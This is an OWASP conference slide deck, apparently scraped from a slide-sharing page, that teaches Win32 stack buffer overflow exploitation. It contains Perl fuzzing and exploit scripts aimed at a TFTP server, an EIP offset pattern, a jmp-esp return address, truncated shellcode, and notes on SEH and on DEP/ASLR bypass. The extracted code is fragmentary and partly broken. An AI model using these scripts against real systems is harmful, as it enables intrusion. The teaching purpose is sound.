Sending a for ahuh. win32 exploit development old school

Sending A for Ahuh.
Win32 Exploit development old school

The OWASP Foundation
http://www.owasp.org
Nahidul Kibria
Co-Leader, OWASP Bangladesh,
Principal Software Engineer,
Orbitax Bangladesh Ltd.
Writing code for fun and food. And a
security enthusiastic
@nahidupa

Sending A for Ahuh.
Win32 Exploit development old school
WTHell this
guy talking
about?

Attacker Dream

7
This is what we will talk about!

How did it happened?

69

How do a program write?
Code
Compiler
executable

We write code in many language

X86 Registers
• EIP - Address of next instruction
• ESP - Address for the top of the stack
• EBP - Stack Base Address
• EAX/ECX/EDX - Holds variables and data
for the application

18
Lets open a exe in debugger

19
Code
CPU
register
mapping
Stack

What is the Stack
• Holds the functions and function
variables
• User Input
• Data needed by the app
• LIFO "last in, first out"

Memory Address
point in EIP
Code
CPU
register
mapping
Stack
Stack pointer

22
Lets Make a application cry

24
Fuzzing
We will send A “x41”

25
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: tftpdwin-0-4-2.pl <target host> <port>nn";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0]
$ARGV[1]";
my $buf="x41"x200;
print $victim $buf;
print " + Malicious request sent ...n";
sleep(2);
print "Done.n";
close($victim);
$host = $ARGV[0];
exit;c

27
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
exit;
}
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
$ARGV[1]";
my $buf="x41"x300;
print $victim $buf;
print " + Malicious request sent ...n";
sleep(2);
print "Done.n";
close($victim);
$host = $ARGV[0];
exit;c

29
First blood
But we don’t know what happened

30
Run the application with debugger

33
Ahu
EIP - Address of next
instruction

Think about this in a process context

36
The program stack in foo() with various inputs
A. - Before data is copied

3737
B. - "hello" is the first command line argument.

3838
C. -
"AAAAAAAAAAAAAAAAAAA
Ax08x35xC0x80" is the first
command line argument.

This is an overﬂow
Too much data in a space not designed for it

Lets back to sending A
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9
Ab
40
We send 300 A but don’t know which
A’s are in EIP

41
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
exit;
}
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
$ARGV[1]";
my
buf="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac
1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7A
g8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj
1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9";
print $victim $buf;
print " + Malicious request sent ...n“;

44
41366941
If you do not notice
yet we also has
control over esp
• ESP - Address for the top of the stack

47
pattern_create / pc | Create a cyclic pattern of a given size
258

48
#!/usr/bin/perl -w
use IO::Socket;
if(!($ARGV[1]))
{
exit;
}
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
$ARGV[1]";
my $buf="x41"x258;
$exploit = $buf. "BBBBccccc" ;
print $victim $exploit;

Find jmp to esp
We can control the EIP and ESP
Little Endian: Little and big endian refers
to those bytes that are the most
significant. In a little-endian system, the
least significant byte is stored first. x86
uses a little-endian architecture.

Next step is how much space we
have for holding our data
ESP about 250 byte

55
my $nop0="x41"x256;
my $buf="x00x01".$nop0;
$eip = "x0AxAFxD8x77";
$calcshell="xfdx2fx49x91xa8x47xbex27x05x43xd4x7cx03xf5x
b5xb8x1cx2dx14xb2xb0x66xf9xbex3dxd7xbexa7x29xc9xdbxdc
xd9x74x24xf4xb1x33x5bx31x73x10x03x73x10x83xfexd3x5cx
52xfcx34x29x9d...";
$exploit = $buf. $eip .$calcshell."x00";
print $victim $exploit;
Shell Code

Final Skeleton Exploit
$Junk $eip $calcShell
w00t
258

Step by step exploit
• Step 1 – Crashing the application:
• Step 2 – Determine the offsets:
• Step 3 – The pain begins, finding an
instruction that will take us back to the
stack:
• Step 4 – Writing venetian shellcode.
• Step 5-Putting it all together

61
Egg hunter
ESP about 250 byte

What is Structured Exception Handling

How to SEH base exploit(in this case we are not overwrite eip)

Data Execution Prevention (DEP)
DEP was introduced in Windows XP Service Pack 2.
Basic idea is
Prevent an application or service from executing code from a
non-executable memory(-NX) region.

DEP is two types
hardware-enforced DEP for CPUs that can mark memory
pages as nonexecutable,
and software-enforced DEP with a limited prevention for
CPUs that do not have hardware support.

DEP can be bypass by “Return to libc”
Reference: http://www.infosecwriters.com/text_resources/pdf/return-to-libc.pdf
We still overwrite the return address with one of a
function in libc, pass it the correct arguments and have that execute for us.
Since these functions do not reside on the stack, we can bypass the stack
protection and execute code.

ASLR(Address Space Layout Randomization )

ASLR can be bypass
“Heap spraying”
JIT spraying most recent check http://dsecrg.com/files/pub/pdf/Confidence2010%20ROP%20and%20JIT-Spray.pdf

Return oriented programming
73

Sending a for ahuh. win32 exploit development old school

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Destaque

Destaque (10)

Semelhante a Sending a for ahuh. win32 exploit development old school

Semelhante a Sending a for ahuh. win32 exploit development old school (20)

Último

Último (20)

Sending a for ahuh. win32 exploit development old school

Notas do Editor